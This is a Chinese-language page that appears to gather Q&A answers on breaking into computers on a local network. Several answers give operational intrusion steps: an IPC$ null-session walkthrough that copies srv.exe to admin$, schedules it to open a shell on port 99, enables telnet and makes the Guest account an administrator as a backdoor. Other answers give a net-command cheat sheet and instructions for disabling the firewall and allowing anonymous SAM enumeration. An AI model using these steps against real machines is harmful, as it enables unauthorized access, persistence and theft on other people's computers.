本地網路入侵
❶ 本地ip和寬頻ip會變嗎 如果別人入侵我電腦是用本地得還是寬頻的呢
首先那得看你用的什麼類型的寬頻了,是動態的外網IP,還是靜態的,如果是動態的,對方不好入侵,因為IP隨時在變更,靜態IP反之。
本地連接跟入侵沒有關系,就是變了,能連接就行,沒有影響
❷ 怎麼在區域網里入侵其他電腦
猥瑣,女人不討厭男人色,但是討厭男人猥瑣的,看上了就大膽一點,找個借口請人家吃飯什麼的,多感動一下別人就OK了,搞這種玩意太猥瑣了
❸ 區域網入侵,高手進!
1.開始-運行-services.msc- 找到"server"服務,屬性啟動類型-"自動"-確定,然後在左邊點"啟動",確定.
2.打開網上鄰居屬性-本地連接屬性-安裝-協議-"nwlink ipx/spx/netblos compatible transport protocl" 雙擊裡面還有個"network monitor driver"也要安裝.
3.開始菜單運行-secpol.msc -安全設置-本地策略-用戶權利指派- "拒絕從網路訪問這台計算機"屬性,刪除裡面的"所有用戶組".
4.然後點安全選項:網路訪問:不允許SAM 帳戶的匿名枚舉, 屬性給"停用".網路訪問: 不允許 SAM 帳戶和共享的匿名枚舉,屬性給"停用".網路訪問: 本地帳戶的共享和安全模型,屬性改為"經典 - 本地用戶以自己的身份驗證".
5.點擊桌面我的電腦右鍵-管理-本地用戶和組-用戶,把右邊的guest用戶屬性"帳戶已停用前面的鉤去掉".
6.打開我的電腦-工具選項-文件夾選項-查看-把使用簡單文件共享前面的鉤去掉,確定.
7.關閉防火牆以上方法不行,就修改注冊表.開始-運行regedit 回車依此找到hkey-local-machine/system/currentcontrolset/control/lsa 在右邊找到restrictanonymous右鍵-修改值設為0,重啟一下電腦。
❹ 如何能區域網入侵別人的計算機
相關命令
建立空連接
net use [url=file://IP/ipc$]\\IP\ipc$[/url] "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接
net use [url=file://IP/ipc$]\\IP\ipc$[/url] "用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享
net use z: [url=file://IP/c$]\\IP\c$[/url] "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: [url=file://IP/c$]\\IP\c$[/url]
刪除一個ipc$連接
net use [url=file://IP/ipc$]\\IP\ipc$[/url] /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
經典入侵模式
1.C:\>net use [url=file://127.0.0.1/IPC$]\\127.0.0.1\IPC$[/url] "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe [url=file://127.0.0.1/admin$]\\127.0.0.1\admin$[/url]
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3.C:\>net time [url=file://127.0.0.1/]\\127.0.0.1[/url]
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4.C:\>at [url=file://127.0.0.1/]\\127.0.0.1[/url] 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5.C:\>net time [url=file://127.0.0.1/]\\127.0.0.1[/url]
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6.C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe [url=file://127.0.0.1/admin$]\\127.0.0.1\admin$[/url]
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8.C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10.C:\>net user guest /active:yes
將對方的Guest用戶激活
11.C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12.C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)
ipc$與空連接,139,445埠,默認共享的關系
❺ 怎麼入侵區域網的電腦
教你一個CMD入侵 IPC$入侵
利用ipc$入侵的相關命令:
我們在入侵的時候難免遇到忘記命令的時候,現在將我所知道的一些命令總結出來提供給各位。通過這些命令可以解決很大一部分新手的問題。
00:net use
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。
命令格式:
net use [devicename | *] [\\\\computername\\sharename[\\volume]] [password | *]] [/user:[domainname\\]username] [[/delete] | [/persistent:{yes | no}]]
參數介紹:
(1)鍵入不帶參數的net use列出網路連接。
(2)devicename指定要連接到的資源名稱或要斷開的設備名稱。
(3)\\\\computername\\sharename伺服器及共享資源的名稱。
(4)password訪問共享資源的密碼。
(5)*提示鍵入密碼。
(6)/user指定進行連接的另外一個用戶。
(7)domainname指定另一個域。
(8)username指定登錄的用戶名。
(9)/home將用戶連接到其宿主目錄。
(10)/delete取消指定網路連接。
(11)/persistent控制永久網路連接的使用。
01: net use \\\\X.X.X.X\\ipc$ \"\" /user:\"\" 建立空連接
02: net use \\\\X.X.X.X\\ipc$ \"密碼\" /user:\"用戶名\" 建立非空連接
03: net use \\\\X.X.X.X\\ipc$ /del 刪除連接
04: net time \\\\X.X.X.X
作用:使計算機的時鍾與另一台計算機或域的時間同步。
命令格式:net time [\\\\computername | /domain[:name]] [/set]
參數介紹:
(1)\\\\computername要檢查或同步的伺服器名。
(2)/domain[:name]指定要與其時間同步的域。
(3)/set使本計算機時鍾與指定計算機或域的時鍾同步。
05: net view \\\\X.X.X.X
作用:顯示域列表、計算機列表或指定計算機的共享資源列表。
命令格式:net view [\\\\computername | /domain[:domainname]]
參數介紹:
(1)鍵入不帶參數的net view顯示當前域的計算機列表。
(2)\\\\computername 指定要查看其共享資源的計算機。
(3)/domain[:domainname]指定要查看其可用計算機的域。
06: net use X: \\\\X.X.X.X\\Y 將共享名為Y的共享資源映射為本地X盤
07: net use X: /del 刪除映射的X盤
08: net share
作用:創建、刪除或顯示共享資源。
命令格式:net share share name=drive:path [/users:number | /unlimited] [/remark:\"text\"]
參數介紹:(1)鍵入不帶參數的net share顯示本地計算機上所有共享資源的信息。 (2)sharename是共享資源的網路名稱。
(3)drive:path指定共享目錄的絕對路徑。
(4)/users:number設置可同時訪問共享資源的最大用戶數。
(5)/unlimited不限制同時訪問共享資源的用戶數。
(6)/remark:\"text \"添加關於資源的注釋,注釋文字用引號引住。
09: net user
作用:添加或更改用戶帳號或顯示用戶帳號信息。
該命令也可以寫為 net users
命令格式:net user [username [password | *] [options]] [/domain]
參數介紹:(1)鍵入不帶參數的net user查看計算機上的用戶帳號列表。
(2)username添加、刪除、更改或查看用戶帳號名。
(3)password為用戶帳號分配或更改密碼。
(4)*提示輸入密碼。
(5)/domain在計算機主域的主域控制器中執行操作。
10: net start 作用:啟動服務,或顯示已啟動服務的列表。
11: net pause 作用:暫停正在運行的服務。
12: net Continue 作用:重新激活掛起的服務。
13: net stop
還可以利用工具,如ATOOL,流光。。。
可以和我交流哦
❻ 區域網入侵命令有哪些
先打開命令提示符,用 ping 命令去ping 它,Reply from 192.168.16.4: bytes=32 time<1ms TTL=128,說明對方沒有防火牆,這樣或許有可能入侵。
下一步,我使用了X-SCAN 3.2對它進行了詳細掃描,對方電腦的操作系統是XP,大家知道XP系統是相當安全的,在一些黑客論壇討論的關於入侵XP的話題也是比較多的,入侵這樣的系統方法只有兩種,一是採用釣魚的方法,這是一種被動的方式讓對方中木馬來控制它。
第二種方法就是如果對方有比較嚴重的漏洞,如RPC溢出
❼ 黑客是怎樣通過網路入侵電腦的
黑客是入侵別人電腦的方法有9種。
1、獲取口令
這又有三種方法:
一是通過網路監聽非法得到用戶口令,這類方法有一定的局限性,但危害性極大,監聽者往往能夠獲得其所在網段的所有用戶賬號和口令,對區域網安全威脅巨大;二是在知道用戶的賬號後(如電子郵件@前面的部分)利用一些專門軟體強行破解用戶口令,這種方法不受網段限制,但黑客要有足夠的耐心和時間;三是在獲得一個伺服器上的用戶口令文件(此文件成為Shadow文件)後,用暴力破解程序破解用戶口令,該方法的使用前提是黑客獲得口令的Shadow文件。
此方法在所有方法中危害最大,因為它不需要像第二種方法那樣一遍又一遍地嘗試登錄伺服器,而是在本地將加密後的口令與Shadow文件中的口令相比較就能非常容易地破獲用戶密碼,尤其對那些弱智用戶(指口令安全系數極低的用戶,如某用戶賬號為zys,其口令就是zys666、666666、或乾脆就是zys等)更是在短短的一兩分鍾內,甚至幾十秒內就可以將其幹掉。
2、放置特洛伊木馬程序
特洛伊木馬程序可以直接侵入用戶的電腦並進行破壞,它常被偽裝成工具程序或者游戲等誘使用戶打開帶有特洛伊木馬程序的郵件附件或從網上直接下載,一旦用戶打開了這些郵件的附件或者執行了這些程序之後,它們就會象古特洛伊人在敵人城外留下的藏滿士兵的木馬一樣留在自己的電腦中,並在自己的計算機系統中隱藏一個可以在Windows啟動時悄悄執行的程序。
當您連接到網際網路上時,這個程序就會通知黑客,來報告您的IP地址以及預先設定的埠。黑客在收到這些信息後,再利用這個潛伏在其中的程序,就可以任意地修改您的計算機的參數設定、復制文件、窺視你整個硬碟中的內容等,從而達到控制你的計算機的目的。
3、WWW的欺騙技術
在網上用戶可以利用IE等瀏覽器進行各種各樣的WEB站點的訪問,如閱讀新聞組、咨詢產品價格、訂閱報紙、電子商務等。然而一般的用戶恐怕不會想到有這些問題存在:正在訪問的網頁已經被黑客篡改過,網頁上的信息是虛假的!例如黑客將用戶要瀏覽的網頁的URL改寫為指向黑客自己的伺服器,當用戶瀏覽目標網頁的時候,實際上是向黑客伺服器發出請求,那麼黑客就可以達到欺騙的目的了。
4、電子郵件攻擊
電子郵件攻擊主要表現為兩種方式:
一是電子郵件轟炸和電子郵件「滾雪球」,也就是通常所說的郵件炸彈,指的是用偽造的IP地址和電子郵件地址向同一信箱發送數以千計、萬計甚至無窮多次的內容相同的垃圾郵件,致使受害人郵箱被「炸」,嚴重者可能會給電子郵件伺服器操作系統帶來危險,甚至癱瘓;
二是電子郵件欺騙,攻擊者佯稱自己為系統管理員(郵件地址和系統管理員完全相同),給用戶發送郵件要求用戶修改口令(口令可能為指定字元串)或在貌似正常的附件中載入病毒或其他木馬程序(據筆者所知,某些單位的網路管理員有定期給用戶免費發送防火牆升級程序的義務,這為黑客成功地利用該方法提供了可乘之機),這類欺騙只要用戶提高警惕,一般危害性不是太大。
5、通過一個節點來攻擊其他節點
黑客在突破一台主機後,往往以此主機作為根據地,攻擊其他主機(以隱蔽其入侵路徑,避免留下蛛絲馬跡)。他們可以使用網路監聽方法,嘗試攻破同一網路內的其他主機;也可以通過IP欺騙和主機信任關系,攻擊其他主機。這類攻擊很狡猾,但由於某些技術很難掌握,如IP欺騙,因此較少被黑客使用。
6、網路監聽
網路監聽是主機的一種工作模式,在這種模式下,主機可以接受到本網段在同一條物理通道上傳輸的所有信息,而不管這些信息的發送方和接受方是誰。此時,如果兩台主機進行通信的信息沒有加密,只要使用某些網路監聽工具,例如NetXray for windows 95/98/nt,sniffit for linux 、solaries等就可以輕而易舉地截取包括口令和帳號在內的信息資料。雖然網路監聽獲得的用戶帳號和口令具有一定的局限性,但監聽者往往能夠獲得其所在網段的所有用戶帳號及口令。
7、尋找系統漏洞
許多系統都有這樣那樣的安全漏洞(Bugs),其中某些是操作系統或應用軟體本身具有的,如Sendmail漏洞,win98中的共享目錄密碼驗證漏洞和IE5漏洞等,這些漏洞在補丁未被開發出來之前一般很難防禦黑客的破壞,除非你將網線拔掉;還有一些漏洞是由於系統管理員配置錯誤引起的,如在網路文件系統中,將目錄和文件以可寫的方式調出,將未加Shadow的用戶密碼文件以明碼方式存放在某一目錄下,這都會給黑客帶來可乘之機,應及時加以修正。
8、利用帳號進行攻擊
有的黑客會利用操作系統提供的預設賬戶和密碼進行攻擊,例如許多UNIX主機都有FTP和Guest等預設賬戶(其密碼和賬戶名同名),有的甚至沒有口令。黑客用Unix操作系統提供的命令如Finger和Ruser等收集信息,不斷提高自己的攻擊能力。這類攻擊只要系統管理員提高警惕,將系統提供的預設賬戶關掉或提醒無口令用戶增加口令一般都能克服。
9、偷取特權
利用各種特洛伊木馬程序、後門程序和黑客自己編寫的導致緩沖區溢出的程序進行攻擊,前者可使黑客非法獲得對用戶機器的完全控制權,後者可使黑客獲得超級用戶的許可權,從而擁有對整個網路的絕對控制權。這種攻擊手段,一旦奏效,危害性極大。
❽ 隔離在本地網路和外界網路之間的一道防禦系統,可以防範黑客入侵的叫什麼
防火牆?
路由器?
交換機?
❾ 知道對方ip如何進行入侵(區域網)
公司有無限路由嗎?通過無限路由能訪問本公司的OA網、等等之類公司內部網頁。然後在設置本本的ip地址一直達到能ping通為止,在去用其他手段入侵台機。
❿ 用網路ip還是本地ip來進入遠程電腦 入侵用的是網路ip還是本地ip
網路IP,本地IP只是你的網路IP又分的,給一個寬頻都有很多本地IP的